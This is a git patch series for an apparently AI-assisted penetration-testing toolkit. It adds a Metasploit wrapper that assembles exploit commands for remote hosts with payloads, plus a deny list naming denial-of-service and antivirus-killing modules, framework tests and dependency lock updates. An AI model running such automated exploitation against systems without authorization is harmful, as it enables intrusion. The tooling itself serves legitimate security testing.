success=False, + output="", + error=f"msfconsole execution error: {str(e)}", + exit_code=-1, + execution_time=time.time() - start_time, + metadata={"error_type": type(e).__name__}, + ) + + def generate_command( + self, capability: str, parameters: Dict[str, Any], context: Optional[ToolContext] = None + ) -> CommandInput: + """Generate msfconsole command for the specified capability.""" + if capability == "exploit": + commands = [f"use {parameters['module']}"] + + # Set required parameters + commands.append(f"set RHOSTS {parameters['rhosts']}") + + # Set optional parameters + if "rport" in parameters: + commands.append(f"set RPORT {parameters['rport']}") + if "payload" in parameters: + commands.append(f"set PAYLOAD {parameters['payload']}") + if "lhost" in parameters: + commands.append(f"set LHOST {parameters['lhost']}") + if "lport" in parameters: + commands.append(f"set LPORT {parameters['lport']}") + + # Set additional options + if "options" in parameters: + for key, value in parameters["options"].items(): + commands.append(f"set {key.upper()} {value}") + + # Execute the exploit + commands.append("exploit") + + return CommandInput( + command="; ".join(commands), + timeout_sec=600, # Exploits may take time + ) + + elif capability == "auxiliary": + commands = [f"use {parameters['module']}"] + + # Set required parameters + if "rhosts" in parameters: + commands.append(f"set RHOSTS {parameters['rhosts']}") + + # Set optional parameters + if "rport" in parameters: + commands.append(f"set RPORT {parameters['rport']}") + + # Set additional options + if "options" in parameters: + for key, value in parameters["options"].items(): + commands.append(f"set {key.upper()} {value}") + + # Run the auxiliary module + commands.append("run") + + return CommandInput(command="; ".join(commands), timeout_sec=300) + + elif capability == "search": + query = parameters["query"] + if "type" in parameters: + query = f"type:{parameters['type']} {query}" + + return 
CommandInput(command=f"search {query}", timeout_sec=60) + + elif capability == "info": + return CommandInput(command=f"info {parameters['module']}", timeout_sec=30) + + else: + raise ValueError(f"Unknown capability: {capability}") + + def _prepare_msf_command(self, command: str) -> str: + """Prepare command for msfconsole execution.""" + # Split commands and clean them up + commands = [cmd.strip() for cmd in command.split(";") if cmd.strip()] + + # Ensure we exit cleanly (add if not present) + if not any("exit" in cmd.lower() for cmd in commands): + commands.append("exit -y") + + return "; ".join(commands) + + def _determine_success(self, output: str, error: str, exit_code: int) -> bool: + """Determine if the msfconsole command was successful.""" + # Check exit code first + if exit_code != 0: + return False + + # Check for success indicators in output + success_indicators = ["Session", "opened", "Auxiliary module execution completed", "Exploit completed"] + + # Check for failure indicators + failure_indicators = [ + "Exploit failed", + "Unable to connect", + "Connection refused", + "No route to host", + "Module failed", + ] + + output_lower = output.lower() + + # Check for explicit failures + for indicator in failure_indicators: + if indicator.lower() in output_lower: + return False + + # Check for success indicators + for indicator in success_indicators: + if indicator.lower() in output_lower: + return True + + # If no clear indicators, consider successful if no errors + return not error or len(error.strip()) == 0 + + def _extract_msf_metadata(self, output: str) -> Dict[str, Any]: + """Extract metadata from msfconsole output.""" + metadata = {} + + # Extract session information + session_match = re.search(r"Session (\d+) opened", output) + if session_match: + metadata["session_id"] = int(session_match.group(1)) + metadata["session_opened"] = True + + # Extract module information + module_match = re.search(r"Module: ([\w/]+)", output) + if module_match: + 
metadata["module"] = module_match.group(1) + + # Extract target information + target_match = re.search(r"RHOSTS\s*=>\s*([\d\.\,\s/]+)", output) + if target_match: + metadata["targets"] = target_match.group(1).strip() + + # Extract payload information + payload_match = re.search(r"PAYLOAD\s*=>\s*([\w/]+)", output) + if payload_match: + metadata["payload"] = payload_match.group(1) + + # Count found modules (for search results) + module_count_match = re.search(r"(\d+)\s+matching modules", output) + if module_count_match: + metadata["matching_modules"] = int(module_count_match.group(1)) + + # Extract vulnerabilities found (for auxiliary modules) + if "appears to be vulnerable" in output.lower(): + metadata["vulnerable"] = True + + return metadata + + def validate_command(self, command: CommandInput) -> tuple[bool, Optional[str]]: + """Validate msfconsole command.""" + cmd = command.command.strip().lower() + + # Check for required msfconsole commands + valid_commands = ["use", "set", "exploit", "run", "search", "info", "exit"] + + # Split into individual commands + commands = [c.strip() for c in cmd.split(";") if c.strip()] + + for command_part in commands: + # Check if command starts with a valid msfconsole command + if not any(command_part.startswith(valid_cmd) for valid_cmd in valid_commands): + return False, f"Invalid msfconsole command: {command_part}" + + # Check for dangerous module usage (optional safety check) + dangerous_modules = [ + "auxiliary/dos/", # Denial of service modules + "post/windows/manage/killav", # Antivirus killing + ] + + for dangerous in dangerous_modules: + if dangerous in cmd: + return False, f"Potentially dangerous module detected: {dangerous}" + + return True, None diff --git a/wish-tools/tests/integrated/test_tool_step_trace.py b/wish-tools/tests/integrated/test_tool_step_trace.py index eda4ccf..71ed5b9 100644 --- a/wish-tools/tests/integrated/test_tool_step_trace.py +++ b/wish-tools/tests/integrated/test_tool_step_trace.py @@ -23,11 
+23,7 @@ async def test_step_trace_workflow(mock_post): print("HTTPレスポンスをモック:", {"status_code": 200, "body": "Success"}) # 関数の実行 - result = main( - run_id="test-run-id", - trace_name="Test Trace", - trace_message="Hello, World!" - ) + result = main(run_id="test-run-id", trace_name="Test Trace", trace_message="Hello, World!") # 結果の出力 print("結果:", result) @@ -41,12 +37,8 @@ async def test_step_trace_workflow(mock_post): # モックが正しく呼び出されたことを確認 mock_post.assert_called_once_with( "http://host.docker.internal:23456/api/addStepTrace", - json={ - "run_id": "test-run-id", - "trace_name": "Test Trace", - "trace_message_base64": "SGVsbG8sIFdvcmxkIQ==" - }, - headers={"Content-Type": "application/json"} + json={"run_id": "test-run-id", "trace_name": "Test Trace", "trace_message_base64": "SGVsbG8sIFdvcmxkIQ=="}, + headers={"Content-Type": "application/json"}, ) @@ -61,11 +53,7 @@ async def test_step_trace_with_error(mock_post): print("HTTP接続エラーをモック: Connection error") # 関数の実行 - result = main( - run_id="test-run-id", - trace_name="Test Trace", - trace_message="Hello, World!" - ) + result = main(run_id="test-run-id", trace_name="Test Trace", trace_message="Hello, World!") # 結果の出力 print("結果:", result) @@ -98,11 +86,7 @@ async def test_step_trace_with_long_message(mock_post): print(f"長いメッセージを作成: {len(long_message)}文字") # 関数の実行 - result = main( - run_id="test-run-id", - trace_name="Long Message Test", - trace_message=long_message - ) + result = main(run_id="test-run-id", trace_name="Long Message Test", trace_message=long_message) # 結果の出力 print("結果:", result) diff --git a/wish-tools/tests/test_tools_framework.py b/wish-tools/tests/test_tools_framework.py new file mode 100644 index 0000000..8a7d13b --- /dev/null +++ b/wish-tools/tests/test_tools_framework.py @@ -0,0 +1,296 @@ +""" +Tests for the wish tools framework. + +This module contains tests for the core framework functionality +including tool registration, discovery, and basic execution. 
+""" + +import tempfile + +import pytest + +from wish_tools.framework import ( + BaseTool, + CommandInput, + TestCase, + ToolCapability, + ToolContext, + ToolMetadata, + ToolResult, + ToolTester, + tool_registry, +) +from wish_tools.framework.testing import ExitCodeValidator, OutputValidator + + +class MockTool(BaseTool): + """Mock tool for testing.""" + + def _build_metadata(self) -> ToolMetadata: + return ToolMetadata( + name="mock", + version="1.0.0", + description="Mock tool for testing", + author="Test Suite", + category="testing", + capabilities=[ + ToolCapability( + name="echo", + description="Echo input text", + parameters={"text": "Text to echo"}, + examples=["echo hello world"], + ) + ], + requirements=["python"], + tags=["test", "mock"], + ) + + async def validate_availability(self): + return True, None + + async def execute(self, command: CommandInput, context: ToolContext, **kwargs): + # Mock execution - just echo the command + return ToolResult( + success=True, + output=f"Mock output: {command.command}", + error=None, + exit_code=0, + execution_time=0.1, + metadata={"mock": True}, + ) + + def generate_command(self, capability: str, parameters: dict, context=None): + if capability == "echo": + return CommandInput(command=f"echo {parameters['text']}", timeout_sec=30) + raise ValueError(f"Unknown capability: {capability}") + + +class TestToolRegistry: + """Test tool registry functionality.""" + + def test_register_tool(self): + """Test tool registration.""" + # Clear registry for clean test + original_tools = tool_registry._tools.copy() + tool_registry._tools.clear() + + try: + tool_registry.register_tool(MockTool) + assert tool_registry.has_tool("mock") + assert "mock" in tool_registry.get_tool_names() + finally: + # Restore registry + tool_registry._tools = original_tools + + def test_get_tool(self): + """Test getting tool instance.""" + # Register mock tool + tool_registry.register_tool(MockTool, override=True) + + tool = 
tool_registry.get_tool("mock") + assert isinstance(tool, MockTool) + assert tool.metadata.name == "mock" + + def test_list_tools(self): + """Test listing all tools.""" + # Register mock tool + tool_registry.register_tool(MockTool, override=True) + + tools = tool_registry.list_tools() + tool_names = [t.name for t in tools] + assert "mock" in tool_names + + def test_search_tools(self): + """Test searching tools.""" + # Register mock tool + tool_registry.register_tool(MockTool, override=True) + + results = tool_registry.search_tools("mock") + assert len(results) >= 1 + assert any(t.name == "mock" for t in results) + + def test_list_by_category(self): + """Test listing tools by category.""" + # Register mock tool + tool_registry.register_tool(MockTool, override=True) + + tools = tool_registry.list_by_category("testing") + assert "mock" in tools + + def test_list_by_tag(self): + """Test listing tools by tag.""" + # Register mock tool + tool_registry.register_tool(MockTool, override=True) + + tools = tool_registry.list_by_tag("test") + assert "mock" in tools + + +class TestBaseTool: + """Test base tool functionality.""" + + def test_tool_metadata(self): + """Test tool metadata generation.""" + tool = MockTool() + metadata = tool.metadata + + assert metadata.name == "mock" + assert metadata.version == "1.0.0" + assert metadata.category == "testing" + assert len(metadata.capabilities) == 1 + assert metadata.capabilities[0].name == "echo" + + def test_get_documentation(self): + """Test documentation generation.""" + tool = MockTool() + docs = tool.get_documentation() + + assert "# mock" in docs + assert "Mock tool for testing" in docs + assert "## Capabilities" in docs + assert "### echo" in docs + + @pytest.mark.asyncio + async def test_validate_availability(self): + """Test availability validation.""" + tool = MockTool() + is_available, error = await tool.validate_availability() + + assert is_available is True + assert error is None + + @pytest.mark.asyncio + async def 
test_execute(self): + """Test command execution.""" + tool = MockTool() + + with tempfile.TemporaryDirectory() as temp_dir: + context = ToolContext(working_directory=temp_dir, run_id="test") + + command = CommandInput(command="test command", timeout_sec=30) + result = await tool.execute(command, context) + + assert result.success is True + assert "Mock output: test command" in result.output + assert result.exit_code == 0 + + def test_generate_command(self): + """Test command generation.""" + tool = MockTool() + + command = tool.generate_command(capability="echo", parameters={"text": "hello world"}) + + assert command.command == "echo hello world" + assert command.timeout_sec == 30 + + +class TestToolTester: + """Test tool testing framework.""" + + @pytest.mark.asyncio + async def test_availability_test(self): + """Test availability testing.""" + tool = MockTool() + tester = ToolTester(tool) + + result = await tester.test_availability() + assert result.passed is True + + @pytest.mark.asyncio + async def test_run_test_case(self): + """Test running a test case.""" + tool = MockTool() + tester = ToolTester(tool) + + test_case = TestCase( + name="echo_test", + description="Test echo functionality", + capability="echo", + parameters={"text": "hello"}, + expected_success=True, + validators=[OutputValidator(contains="Mock output"), ExitCodeValidator(expected=0)], + ) + + result = await tester.run_test_case(test_case) + assert result.passed is True + assert result.tool_result is not None + assert result.tool_result.success is True + + def test_generate_report(self): + """Test report generation.""" + tool = MockTool() + tester = ToolTester(tool) + + # Create mock results + from wish_tools.framework.testing import TestResult + + mock_result = TestResult( + test_case=TestCase( + name="test", + description="Test case", + capability="echo", + parameters={}, + expected_success=True, + validators=[], + ), + passed=True, + execution_time=0.1, + tool_result=ToolResult( + 
success=True, output="test output", error=None, exit_code=0, execution_time=0.1, metadata={} + ), + error=None, + validation_errors=[], + ) + + report = tester.generate_report([mock_result]) + assert "# Test Report for mock" in report + assert "✅ PASSED" in report + assert "test output" in report + + +@pytest.mark.integration +class TestRealTools: + """Integration tests with real tools (if available).""" + + @pytest.mark.asyncio + async def test_bash_tool(self): + """Test bash tool if available.""" + try: + from wish_tools.tools.bash import BashTool + + tool = BashTool() + is_available, _ = await tool.validate_availability() + + if is_available: + with tempfile.TemporaryDirectory() as temp_dir: + context = ToolContext(working_directory=temp_dir, run_id="test") + + command = CommandInput(command="echo 'test'", timeout_sec=30) + result = await tool.execute(command, context) + + assert result.success is True + assert "test" in result.output + except ImportError: + pytest.skip("BashTool not available") + + @pytest.mark.asyncio + async def test_tool_documentation_generation(self): + """Test that all tools can generate documentation.""" + try: + from wish_tools.tools import BashTool, MsfconsoleTool + + for tool_class in [BashTool, MsfconsoleTool]: + tool = tool_class() + docs = tool.get_documentation() + + # Basic documentation structure checks + assert f"# {tool.metadata.name}" in docs + assert "## Requirements" in docs + assert "## Capabilities" in docs + + except ImportError: + pytest.skip("Tool imports not available") + + +if __name__ == "__main__": + pytest.main([__file__]) diff --git a/wish-tools/tests/unit/test_tool_step_trace.py b/wish-tools/tests/unit/test_tool_step_trace.py index d7ec6bf..b722aa2 100644 --- a/wish-tools/tests/unit/test_tool_step_trace.py +++ b/wish-tools/tests/unit/test_tool_step_trace.py @@ -24,11 +24,7 @@ class TestToolStepTrace: def test_encode_trace_message(self): """Test encoding trace message to Base64.""" # Setup - state = 
StepTraceState( - run_id="test-run-id", - trace_name="Test Trace", - trace_message="Hello, World!" - ) + state = StepTraceState(run_id="test-run-id", trace_name="Test Trace", trace_message="Hello, World!") # Call function result = encode_trace_message(state) @@ -53,7 +49,7 @@ def test_post_step_trace_success(self, mock_post): run_id="test-run-id", trace_name="Test Trace", trace_message="Hello, World!", - trace_message_base64="SGVsbG8sIFdvcmxkIQ==" + trace_message_base64="SGVsbG8sIFdvcmxkIQ==", ) # Call function @@ -70,12 +66,8 @@ def test_post_step_trace_success(self, mock_post): # Verify mock was called with correct parameters mock_post.assert_called_once_with( "http://host.docker.internal:23456/api/addStepTrace", - json={ - "run_id": "test-run-id", - "trace_name": "Test Trace", - "trace_message_base64": "SGVsbG8sIFdvcmxkIQ==" - }, - headers={"Content-Type": "application/json"} + json={"run_id": "test-run-id", "trace_name": "Test Trace", "trace_message_base64": "SGVsbG8sIFdvcmxkIQ=="}, + headers={"Content-Type": "application/json"}, ) @patch("wish_tools.tool_step_trace.requests.post") @@ -89,7 +81,7 @@ def test_post_step_trace_error(self, mock_post): run_id="test-run-id", trace_name="Test Trace", trace_message="Hello, World!", - trace_message_base64="SGVsbG8sIFdvcmxkIQ==" + trace_message_base64="SGVsbG8sIFdvcmxkIQ==", ) # Call function @@ -119,19 +111,12 @@ def test_main_success(self, mock_build_graph): # Setup mock mock_graph = MagicMock() mock_workflow = MagicMock() - mock_workflow.invoke.return_value = { - "response_status_code": 200, - "response_body": "Success" - } + mock_workflow.invoke.return_value = {"response_status_code": 200, "response_body": "Success"} mock_graph.compile.return_value = mock_workflow mock_build_graph.return_value = mock_graph # Call function - result = main( - run_id="test-run-id", - trace_name="Test Trace", - trace_message="Hello, World!" 
- ) + result = main(run_id="test-run-id", trace_name="Test Trace", trace_message="Hello, World!") # Verify result assert result["status_code"] == 200 @@ -149,11 +134,7 @@ def test_main_error(self, mock_build_graph): mock_build_graph.side_effect = Exception("Test error") # Call function - result = main( - run_id="test-run-id", - trace_name="Test Trace", - trace_message="Hello, World!" - ) + result = main(run_id="test-run-id", trace_name="Test Trace", trace_message="Hello, World!") # Verify result assert result["status_code"] == 599 diff --git a/wish-tools/uv.lock b/wish-tools/uv.lock index 83efd98..b1c60ee 100644 --- a/wish-tools/uv.lock +++ b/wish-tools/uv.lock @@ -96,6 +96,15 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/7c/fc/6a8cb64e5f0324877d503c854da15d76c1e50eb722e320b15345c4d0c6de/cffi-1.17.1-cp313-cp313-win_amd64.whl", hash = "sha256:f6a16c31041f09ead72d69f583767292f750d24913dadacf5756b966aacb3f1a", size = 182009 }, ] +[[package]] +name = "cfgv" +version = "3.4.0" +source = { registry = "https://pypi.org/simple" } +sdist = { url = "https://files.pythonhosted.org/packages/11/74/539e56497d9bd1d484fd863dd69cbbfa653cd2aa27abfe35653494d85e94/cfgv-3.4.0.tar.gz", hash = "sha256:e52591d4c5f5dead8e0f673fb16db7949d2cfb3f7da4582893288f0ded8fe560", size = 7114 } +wheels = [ + { url = "https://files.pythonhosted.org/packages/c5/55/51844dd50c4fc7a33b653bfaba4c2456f06955289ca770a5dbd5fd267374/cfgv-3.4.0-py2.py3-none-any.whl", hash = "sha256:b7265b1f29fd3316bfcd2b330d63d024f2bfd8bcb8b0272f8e19a504856c48f9", size = 7249 }, +] + [[package]] name = "charset-normalizer" version = "3.4.1" @@ -166,6 +175,15 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/d1/d6/3965ed04c63042e047cb6a3e6ed1a63a35087b6a609aa3a15ed8ac56c221/colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6", size = 25335 }, ] +[[package]] +name = "distlib" +version = "0.3.9" +source = { registry = 
"https://pypi.org/simple" } +sdist = { url = "https://files.pythonhosted.org/packages/0d/dd/1bec4c5ddb504ca60fc29472f3d27e8d4da1257a854e1d96742f15c1d02d/distlib-0.3.9.tar.gz", hash = "sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403", size = 613923 } +wheels = [ + { url = "https://files.pythonhosted.org/packages/91/a1/cf2472db20f7ce4a6be1253a81cfdf85ad9c7885ffbed7047fb72c24cf87/distlib-0.3.9-py2.py3-none-any.whl", hash = "sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87", size = 468973 }, +] + [[package]] name = "exceptiongroup" version = "1.2.2" @@ -199,6 +217,15 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/d7/a1/8936bc8e79af80ca38288dd93ed44ed1f9d63beb25447a4c59e746e01f8d/faker-37.1.0-py3-none-any.whl", hash = "sha256:dc2f730be71cb770e9c715b13374d80dbcee879675121ab51f9683d262ae9a1c", size = 1918783 }, ] +[[package]] +name = "filelock" +version = "3.18.0" +source = { registry = "https://pypi.org/simple" } +sdist = { url = "https://files.pythonhosted.org/packages/0a/10/c23352565a6544bdc5353e0b15fc1c563352101f30e24bf500207a54df9a/filelock-3.18.0.tar.gz", hash = "sha256:adbc88eabb99d2fec8c9c1b229b171f18afa655400173ddc653d5d01501fb9f2", size = 18075 } +wheels = [ + { url = "https://files.pythonhosted.org/packages/4d/36/2a115987e2d8c300a974597416d9de88f2444426de9571f4b59b2cca3acc/filelock-3.18.0-py3-none-any.whl", hash = "sha256:c401f4f8377c4464e6db25fff06205fd89bdd83b65eb0488ed1b160f780e21de", size = 16215 }, +] + [[package]] name = "graphviz" version = "0.20.3" @@ -245,6 +272,15 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/2a/39/e50c7c3a983047577ee07d2a9e53faf5a69493943ec3f6a384bdc792deb2/httpx-0.28.1-py3-none-any.whl", hash = "sha256:d909fcccc110f8c7faf814ca82a9a4d816bc5a6dbfea25d6591d6985b8ba59ad", size = 73517 }, ] +[[package]] +name = "identify" +version = "2.6.12" +source = { registry = "https://pypi.org/simple" } +sdist = { url = 
"https://files.pythonhosted.org/packages/a2/88/d193a27416618628a5eea64e3223acd800b40749a96ffb322a9b55a49ed1/identify-2.6.12.tar.gz", hash = "sha256:d8de45749f1efb108badef65ee8386f0f7bb19a7f26185f74de6367bffbaf0e6", size = 99254 } +wheels = [ + { url = "https://files.pythonhosted.org/packages/7a/cd/18f8da995b658420625f7ef13f037be53ae04ec5ad33f9b718240dcfd48c/identify-2.6.12-py2.py3-none-any.whl", hash = "sha256:ad9672d5a72e0d2ff7c5c8809b62dfa60458626352fb0eb7b55e69bdc45334a2", size = 99145 }, +] + [[package]] name = "idna" version = "3.10" @@ -375,6 +411,15 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/53/fc/31046fb293e5549a41fda5b6ff56fc0d46d2b7ed7dd8206fd20e3fb21e1b/langsmith-0.3.34-py3-none-any.whl", hash = "sha256:5927d726a78dbd1aa387be024ab76efa67444aec9b21b14c1de8214a233bb166", size = 358906 }, ] +[[package]] +name = "nodeenv" +version = "1.9.1" +source = { registry = "https://pypi.org/simple" } +sdist = { url = "https://files.pythonhosted.org/packages/43/16/fc88b08840de0e0a72a2f9d8c6bae36be573e475a6326ae854bcc549fc45/nodeenv-1.9.1.tar.gz", hash = "sha256:6ec12890a2dab7946721edbfbcd91f3319c6ccc9aec47be7c7e6b7011ee6645f", size = 47437 } +wheels = [ + { url = "https://files.pythonhosted.org/packages/d2/1d/1b658dbd2b9fa9c4c9f32accbfc0205d532c8c6194dc0f2a4c0428e7128a/nodeenv-1.9.1-py2.py3-none-any.whl", hash = "sha256:ba11c9782d29c27c70ffbdda2d7415098754709be8a7056d79a737cd901155c9", size = 22314 }, +] + [[package]] name = "orjson" version = "3.10.16" @@ -486,6 +531,15 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/88/ef/eb23f262cca3c0c4eb7ab1933c3b1f03d021f2c48f54763065b6f0e321be/packaging-24.2-py3-none-any.whl", hash = "sha256:09abb1bccd265c01f4a3aa3f7a7db064b36514d2cba19a2f694fe6150451a759", size = 65451 }, ] +[[package]] +name = "platformdirs" +version = "4.3.8" +source = { registry = "https://pypi.org/simple" } +sdist = { url = 
"https://files.pythonhosted.org/packages/fe/8b/3c73abc9c759ecd3f1f7ceff6685840859e8070c4d947c93fae71f6a0bf2/platformdirs-4.3.8.tar.gz", hash = "sha256:3d512d96e16bcb959a814c9f348431070822a6496326a4be0911c40b5a74c2bc", size = 21362 } +wheels = [ + { url = "https://files.pythonhosted.org/packages/fe/39/979e8e21520d4e47a0bbe349e2713c0aac6f3d853d0e5b34d76206c439aa/platformdirs-4.3.8-py3-none-any.whl", hash = "sha256:ff7059bb7eb1179e2685604f4aaf157cfd9535242bd23742eadc3c13542139b4", size = 18567 }, +] + [[package]] name = "pluggy" version = "1.5.0" @@ -495,6 +549,22 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/88/5f/e351af9a41f866ac3f1fac4ca0613908d9a41741cfcf2228f4ad853b697d/pluggy-1.5.0-py3-none-any.whl", hash = "sha256:44e1ad92c8ca002de6377e165f3e0f1be63266ab4d554740532335b9d75ea669", size = 20556 }, ] +[[package]] +name = "pre-commit" +version = "4.2.0" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "cfgv" }, + { name = "identify" }, + { name = "nodeenv" }, + { name = "pyyaml" }, + { name = "virtualenv" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/08/39/679ca9b26c7bb2999ff122d50faa301e49af82ca9c066ec061cfbc0c6784/pre_commit-4.2.0.tar.gz", hash = "sha256:601283b9757afd87d40c4c4a9b2b5de9637a8ea02eaff7adc2d0fb4e04841146", size = 193424 } +wheels = [ + { url = "https://files.pythonhosted.org/packages/88/74/a88bf1b1efeae488a0c0b7bdf71429c313722d1fc0f377537fbe554e6180/pre_commit-4.2.0-py2.py3-none-any.whl", hash = "sha256:a009ca7205f1eb497d10b845e52c838a98b6cdd2102a6c8e4540e94ee75c58bd", size = 220707 }, +] + [[package]] name = "pycparser" version = "2.22" @@ -827,6 +897,20 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/6b/11/cc635220681e93a0183390e26485430ca2c7b5f9d33b15c74c2861cb8091/urllib3-2.4.0-py3-none-any.whl", hash = "sha256:4e16665048960a0900c702d4a66415956a584919c03361cac9f1df5c5dd7e813", size = 128680 }, ] +[[package]] +name = "virtualenv" +version = "20.31.2" +source = { 
registry = "https://pypi.org/simple" } +dependencies = [ + { name = "distlib" }, + { name = "filelock" }, + { name = "platformdirs" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/56/2c/444f465fb2c65f40c3a104fd0c495184c4f2336d65baf398e3c75d72ea94/virtualenv-20.31.2.tar.gz", hash = "sha256:e10c0a9d02835e592521be48b332b6caee6887f332c111aa79a09b9e79efc2af", size = 6076316 } +wheels = [ + { url = "https://files.pythonhosted.org/packages/f3/40/b1c265d4b2b62b58576588510fc4d1fe60a86319c8de99fd8e9fec617d2c/virtualenv-20.31.2-py3-none-any.whl", hash = "sha256:36efd0d9650ee985f0cad72065001e66d49a6f24eb44d98980f630686243cf11", size = 6057982 }, +] + [[package]] name = "wish-tools" version = "0.1.0" @@ -841,6 +925,7 @@ dependencies = [ dev = [ { name = "factory-boy" }, { name = "graphviz" }, + { name = "pre-commit" }, { name = "pytest" }, { name = "pytest-asyncio" }, { name = "ruff" }, @@ -857,6 +942,7 @@ requires-dist = [ dev = [ { name = "factory-boy", specifier = ">=3.3.1" }, { name = "graphviz", specifier = ">=0.20.1" }, + { name = "pre-commit", specifier = ">=3.6.0" }, { name = "pytest", specifier = ">=8.3.4" }, { name = "pytest-asyncio", specifier = ">=0.25.2" }, { name = "ruff", specifier = ">=0.9.8" }, From be97b60b9fa99fd34e8528d115ac5e5333055d93 Mon Sep 17 00:00:00 2001 From: Sho Nakatani Date: Fri, 30 May 2025 06:46:39 +0900 Subject: [PATCH 3/4] feat: add pre-commit as a development dependency across multiple components --- wish-api/uv.lock | 1 + .../wish_command_execution/backend/bash.py | 5 ++--- .../tests/backend/test_bash_backend.py | 20 +++++++++++------- wish-command-execution/uv.lock | 1 + wish-command-generation-api/uv.lock | 1 + .../nodes/command_state_classifier.py | 21 ++++++++++--------- wish-sh/uv.lock | 1 + 7 files changed, 29 insertions(+), 21 deletions(-) diff --git a/wish-api/uv.lock b/wish-api/uv.lock index e2d6582..0ee7b54 100644 --- a/wish-api/uv.lock +++ b/wish-api/uv.lock @@ -2954,6 +2954,7 @@ requires-dist = [ dev = [ { name = 
"factory-boy", specifier = ">=3.3.1" }, { name = "graphviz", specifier = ">=0.20.1" }, + { name = "pre-commit", specifier = ">=3.6.0" }, { name = "pytest", specifier = ">=8.3.4" }, { name = "pytest-asyncio", specifier = ">=0.25.2" }, { name = "ruff", specifier = ">=0.9.8" }, diff --git a/wish-command-execution/src/wish_command_execution/backend/bash.py b/wish-command-execution/src/wish_command_execution/backend/bash.py index 96cf966..cceafee 100644 --- a/wish-command-execution/src/wish_command_execution/backend/bash.py +++ b/wish-command-execution/src/wish_command_execution/backend/bash.py @@ -128,7 +128,6 @@ async def execute_command(self, wish: Wish, command: str, cmd_num: int, log_file cmd_num: The command number. log_files: The log files to write output to. timeout_sec: The timeout in seconds for this command. - Note: Commands are executed in the working directory /app/{run_id}/ to isolate command execution from the application source code. @@ -145,11 +144,11 @@ async def execute_command(self, wish: Wish, command: str, cmd_num: int, log_file try: # 作業ディレクトリを設定 cwd = f"/app/{self.run_id or wish.id}/" - + # ディレクトリが存在することを確認 import os os.makedirs(cwd, exist_ok=True) - + # Start the process (this is still synchronous, but the interface is async) process = subprocess.Popen( command, diff --git a/wish-command-execution/tests/backend/test_bash_backend.py b/wish-command-execution/tests/backend/test_bash_backend.py index 4971980..2778b8c 100644 --- a/wish-command-execution/tests/backend/test_bash_backend.py +++ b/wish-command-execution/tests/backend/test_bash_backend.py @@ -60,10 +60,10 @@ async def test_execute_command(self, mock_makedirs, mock_open, mock_popen, backe # Expected working directory expected_cwd = f"/app/{backend.run_id or wish.id}/" - + # Verify that os.makedirs was called to ensure the directory exists mock_makedirs.assert_called_once_with(expected_cwd, exist_ok=True) - + # Verify that Popen was called with the expected command and cwd 
mock_popen.assert_any_call( cmd, @@ -87,7 +87,9 @@ async def test_execute_command(self, mock_makedirs, mock_open, mock_popen, backe @patch("subprocess.Popen") @patch("builtins.open") @patch("os.makedirs") - async def test_execute_command_subprocess_error(self, mock_makedirs, mock_open, mock_popen, backend, wish, log_files): + async def test_execute_command_subprocess_error( + self, mock_makedirs, mock_open, mock_popen, backend, wish, log_files + ): """Test execute_command method with subprocess error.""" # Set up the mock Popen to raise a subprocess error mock_popen.side_effect = subprocess.SubprocessError("Mock error") @@ -102,10 +104,10 @@ async def test_execute_command_subprocess_error(self, mock_makedirs, mock_open, cmd_num = 1 timeout_sec = 60 await backend.execute_command(wish, cmd, cmd_num, log_files, timeout_sec) - + # Expected working directory expected_cwd = f"/app/{backend.run_id or wish.id}/" - + # Verify that os.makedirs was called to ensure the directory exists mock_makedirs.assert_called_once_with(expected_cwd, exist_ok=True) @@ -193,7 +195,9 @@ async def test_cancel_command_not_running(self, backend, wish): @patch("subprocess.Popen") @patch("builtins.open") @patch("os.makedirs") - async def test_execute_command_without_variable_replacement(self, mock_makedirs, mock_open, mock_popen, backend, wish, log_files): + async def test_execute_command_without_variable_replacement( + self, mock_makedirs, mock_open, mock_popen, backend, wish, log_files + ): """Test execute_command method without variable replacement.""" # Set up the mock Popen mock_process = MagicMock() @@ -212,10 +216,10 @@ async def test_execute_command_without_variable_replacement(self, mock_makedirs, # Expected working directory expected_cwd = f"/app/{backend.run_id or wish.id}/" - + # Verify that os.makedirs was called to ensure the directory exists mock_makedirs.assert_called_once_with(expected_cwd, exist_ok=True) - + # Verify that Popen was called with the original command and correct 
cwd mock_popen.assert_any_call( cmd, diff --git a/wish-command-execution/uv.lock b/wish-command-execution/uv.lock index af9d1ef..37938da 100644 --- a/wish-command-execution/uv.lock +++ b/wish-command-execution/uv.lock @@ -1046,6 +1046,7 @@ requires-dist = [ dev = [ { name = "factory-boy", specifier = ">=3.3.1" }, { name = "graphviz", specifier = ">=0.20.1" }, + { name = "pre-commit", specifier = ">=3.6.0" }, { name = "pytest", specifier = ">=8.3.4" }, { name = "pytest-asyncio", specifier = ">=0.25.2" }, { name = "ruff", specifier = ">=0.9.8" }, diff --git a/wish-command-generation-api/uv.lock b/wish-command-generation-api/uv.lock index 1e3ed98..e8baf93 100644 --- a/wish-command-generation-api/uv.lock +++ b/wish-command-generation-api/uv.lock @@ -3079,6 +3079,7 @@ requires-dist = [ dev = [ { name = "factory-boy", specifier = ">=3.3.1" }, { name = "graphviz", specifier = ">=0.20.1" }, + { name = "pre-commit", specifier = ">=3.6.0" }, { name = "pytest", specifier = ">=8.3.4" }, { name = "pytest-asyncio", specifier = ">=0.25.2" }, { name = "ruff", specifier = ">=0.9.8" }, diff --git a/wish-log-analysis-api/src/wish_log_analysis_api/nodes/command_state_classifier.py b/wish-log-analysis-api/src/wish_log_analysis_api/nodes/command_state_classifier.py index bc28227..4a4fa9d 100644 --- a/wish-log-analysis-api/src/wish_log_analysis_api/nodes/command_state_classifier.py +++ b/wish-log-analysis-api/src/wish_log_analysis_api/nodes/command_state_classifier.py @@ -2,7 